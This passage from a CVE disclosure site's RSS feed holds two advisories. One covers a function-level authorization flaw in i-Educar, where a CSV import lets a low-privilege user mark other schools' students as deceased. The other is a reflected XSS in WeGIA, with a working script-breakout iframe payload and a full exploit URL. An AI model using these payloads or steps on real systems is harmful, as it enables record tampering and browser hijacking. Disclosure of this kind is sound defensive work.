&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 17 Mar 2026 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2026-2015</title>
        <link>https://www.cvehunters.com/p/cve-2026-2015/</link>
        <guid>https://www.cvehunters.com/p/cve-2026-2015/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2026-2015-broken-function-level-authorization-bfla-allows-arbitrary-modification-of-student-records-via-final-status-import-tool&amp;#34;&amp;gt;CVE-2026-2015: Broken Function Level Authorization (BFLA) allows arbitrary modification of &amp;lt;code&amp;gt;Student Records&amp;lt;/code&amp;gt; via &amp;lt;code&amp;gt;Final Status Import&amp;lt;/code&amp;gt; tool
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2026-2015&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2026-2015&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Broken Function Level Authorization (BFLA) vulnerability was identified in the &amp;lt;code&amp;gt;Final Status Import&amp;lt;/code&amp;gt; tool of the i-Educar application. This flaw allows an authenticated user with &amp;lt;code&amp;gt;&amp;#34;School&amp;#34;&amp;lt;/code&amp;gt; level permissions to bypass intended functional restrictions and modify academic records belonging to any school unit within the municipal network.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2026-2015-broken-function-level-authorization-bfla-allows-arbitrary-modification-of-student-records-via-final-status-import-tool&amp;#34;&amp;gt;CVE-2026-2015: Broken Function Level Authorization (BFLA) allows arbitrary modification of &amp;lt;code&amp;gt;Student Records&amp;lt;/code&amp;gt; via &amp;lt;code&amp;gt;Final Status Import&amp;lt;/code&amp;gt; tool
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2026-2015&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2026-2015&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Broken Function Level Authorization (BFLA) vulnerability was identified in the &amp;lt;code&amp;gt;Final Status Import&amp;lt;/code&amp;gt; tool of the i-Educar application. This flaw allows an authenticated user with &amp;lt;code&amp;gt;&amp;#34;School&amp;#34;&amp;lt;/code&amp;gt; level permissions to bypass intended functional restrictions and modify academic records belonging to any school unit within the municipal network.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Component: &amp;lt;code&amp;gt;Configurations &amp;amp;gt; Tools &amp;amp;gt; Final Status Import&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;context&amp;#34;&amp;gt;Context:
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The attacker account is strictly limited to a specific school unit (Elementary School) with &amp;lt;code&amp;gt;low-level&amp;lt;/code&amp;gt; &amp;#34;School&amp;#34; permissions. All administrative or global editing permissions are disabled.&amp;lt;/p&amp;gt;
&amp;lt;h4 id=&amp;#34;authorized-access&amp;#34;&amp;gt;Authorized Access:
&amp;lt;/h4&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;When an administrative user (with global or proper local permissions) accesses a student&amp;#39;s record, the &amp;#34;Final Status&amp;#34; dropdown is visible and fully functional, allowing manual status updates.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2026-2015/image-5.png&amp;#34;
	width=&amp;#34;397&amp;#34;
	height=&amp;#34;303&amp;#34;
	srcset=&amp;#34;/p/cve-2026-2015/image-5_hu_c70c79ad0e6a6e84.png 480w, /p/cve-2026-2015/image-5_hu_8f3ed5f7812ceb8e.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;131&amp;#34;
		data-flex-basis=&amp;#34;314px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h4 id=&amp;#34;unauthorized-access-attacker-view&amp;#34;&amp;gt;Unauthorized Access (Attacker View):
&amp;lt;/h4&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;When the attacker attempts to edit a student from a different school unit via the standard UI, the &amp;#34;Final Status&amp;#34; dropdown is hidden. The system correctly identifies that the user lacks the authority for this specific function in the frontend.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2026-2015/image-6.png&amp;#34;
	width=&amp;#34;411&amp;#34;
	height=&amp;#34;158&amp;#34;
	srcset=&amp;#34;/p/cve-2026-2015/image-6_hu_5510dcd616bc5d5f.png 480w, /p/cve-2026-2015/image-6_hu_7a6c2b34808b5d5b.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;260&amp;#34;
		data-flex-basis=&amp;#34;624px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The attacker identifies student IDs from other institutions (e.g., IDs 212, 199, 200). A CSV payload is prepared to force a status change to &amp;#34;Falecido&amp;#34; (Deceased).&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2026-2015/image.png&amp;#34;
	width=&amp;#34;894&amp;#34;
	height=&amp;#34;190&amp;#34;
	srcset=&amp;#34;/p/cve-2026-2015/image_hu_c7c42b10db2b974d.png 480w, /p/cve-2026-2015/image_hu_6d3b4c2322653ac2.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;470&amp;#34;
		data-flex-basis=&amp;#34;1129px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2026-2015/image-1.png&amp;#34;
	width=&amp;#34;1545&amp;#34;
	height=&amp;#34;529&amp;#34;
	srcset=&amp;#34;/p/cve-2026-2015/image-1_hu_6d735bdfad336652.png 480w, /p/cve-2026-2015/image-1_hu_a4d2bd6942b71675.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;292&amp;#34;
		data-flex-basis=&amp;#34;700px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;steps-to-reproduce&amp;#34;&amp;gt;Steps to Reproduce:
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The attacker navigates to the Final Status Import tool. By uploading the CSV, they trigger the vulnerable service. The backend processes the IDs without validating institutional ownership.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2026-2015/image-2.png&amp;#34;
	width=&amp;#34;1006&amp;#34;
	height=&amp;#34;679&amp;#34;
	srcset=&amp;#34;/p/cve-2026-2015/image-2_hu_e7355ace98b61b4b.png 480w, /p/cve-2026-2015/image-2_hu_12ff1c22bcc7bc72.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;148&amp;#34;
		data-flex-basis=&amp;#34;355px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The tool reports success for all records. A check on the target student&amp;#39;s profile (from the unauthorized unit) confirms the status has been changed. Multiple students are affected, proving the mass-sabotage capability.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2026-2015/image-3.png&amp;#34;
	width=&amp;#34;1545&amp;#34;
	height=&amp;#34;858&amp;#34;
	srcset=&amp;#34;/p/cve-2026-2015/image-3_hu_be60c479f60e4c9d.png 480w, /p/cve-2026-2015/image-3_hu_32d0a507a865efc.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;180&amp;#34;
		data-flex-basis=&amp;#34;432px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2026-2015/image-4.png&amp;#34;
	width=&amp;#34;1548&amp;#34;
	height=&amp;#34;863&amp;#34;
	srcset=&amp;#34;/p/cve-2026-2015/image-4_hu_b90d49652e2eba69.png 480w, /p/cve-2026-2015/image-4_hu_d09d377b734095d7.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;179&amp;#34;
		data-flex-basis=&amp;#34;430px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This is a Broken Function Level Authorization (BFLA) vulnerability, as categorized by OWASP API Security Top 10 (2023) - API4. The consequences include:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Tampering with academic data without authorization.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Loss of data integrity in school records.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Potential legal and reputational damage for educational institutions.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/ViniCastro2001/Security_Reports/blob/main/i-educar/BFLA-Final-Status-Import/README.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/ViniCastro2001/Security_Reports/blob/main/i-educar/BFLA-Final-Status-Import/README.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/vinicius-gross-castro&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/viniciusCastro50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/vinicius-gross-castro&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Vinicius Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 06 Feb 2026 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2026-23722</title>
        <link>https://www.cvehunters.com/p/cve-2026-23722/</link>
        <guid>https://www.cvehunters.com/p/cve-2026-23722/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2026-23722-cross-site-scripting-xss-reflected-allows-arbitrary-code-execution-and-ui-redressing&amp;#34;&amp;gt;CVE-2026-23722: Cross-Site Scripting (XSS) Reflected allows arbitrary code execution and UI redressing
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2026-23722&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2026-23722&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was discovered in the WeGIA system, specifically within the &amp;lt;code&amp;gt;html/memorando/insere_despacho.php&amp;lt;/code&amp;gt; file.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/html/memorando/insere_despacho.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;id_memorando&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;iframe&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;https://js-dos.com/games/doom.exe.html&amp;amp;#34;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;style&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;position:fixed; top:0; left:0; bottom:0; right:0; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;iframe&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h4 id=&amp;#34;example-of-url&amp;#34;&amp;gt;Example of URL:
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;https://sec.wegia.org:8000/WeGIA/html/memorando/insere_despacho.php?id_memorando=1%3C%2Fscript%3E%3Ciframe%20src%3D%22https%3A%2F%2Fjs-dos.com%2Fgames%2Fdoom.exe.html%22%20style%3D%22position%3Afixed%3B%20top%3A0%3B%20left%3A0%3B%20bottom%3A0%3B%20right%3A0%3B%20width%3A100%25%3B%20height%3A100%25%3B%20border%3Anone%3B%20margin%3A0%3B%20padding%3A0%3B%20overflow%3Ahidden%3B%20z-index%3A999999%3B%22%3E%3C%2Fiframe%3E
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;steps-to-reproduce&amp;#34;&amp;gt;Steps to Reproduce
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;The payload breaks out of the existing context (likely a JavaScript variable assignment) using &amp;lt;code&amp;gt;script tag&amp;lt;/code&amp;gt; and injects an external iframe that covers the entire viewport.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2026-23722-cross-site-scripting-xss-reflected-allows-arbitrary-code-execution-and-ui-redressing&amp;#34;&amp;gt;CVE-2026-23722: Cross-Site Scripting (XSS) Reflected allows arbitrary code execution and UI redressing
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2026-23722&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2026-23722&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was discovered in the WeGIA system, specifically within the &amp;lt;code&amp;gt;html/memorando/insere_despacho.php&amp;lt;/code&amp;gt; file.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/html/memorando/insere_despacho.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;id_memorando&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;iframe&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;https://js-dos.com/games/doom.exe.html&amp;amp;#34;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;style&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;position:fixed; top:0; left:0; bottom:0; right:0; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;iframe&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h4 id=&amp;#34;example-of-url&amp;#34;&amp;gt;Example of URL:
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;https://sec.wegia.org:8000/WeGIA/html/memorando/insere_despacho.php?id_memorando=1%3C%2Fscript%3E%3Ciframe%20src%3D%22https%3A%2F%2Fjs-dos.com%2Fgames%2Fdoom.exe.html%22%20style%3D%22position%3Afixed%3B%20top%3A0%3B%20left%3A0%3B%20bottom%3A0%3B%20right%3A0%3B%20width%3A100%25%3B%20height%3A100%25%3B%20border%3Anone%3B%20margin%3A0%3B%20padding%3A0%3B%20overflow%3Ahidden%3B%20z-index%3A999999%3B%22%3E%3C%2Fiframe%3E
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;steps-to-reproduce&amp;#34;&amp;gt;Steps to Reproduce
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;The payload breaks out of the existing context (likely a JavaScript variable assignment) using &amp;lt;code&amp;gt;script tag&amp;lt;/code&amp;gt; and injects an external iframe that covers the entire viewport.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2026-23722/image.png&amp;#34;
	width=&amp;#34;1919&amp;#34;
	height=&amp;#34;875&amp;#34;
	srcset=&amp;#34;/p/cve-2026-23722/image_hu_bd7167f4b849a834.png 480w, /p/cve-2026-23722/image_hu_f207a24f416f7704.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;219&amp;#34;
		data-flex-basis=&amp;#34;526px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
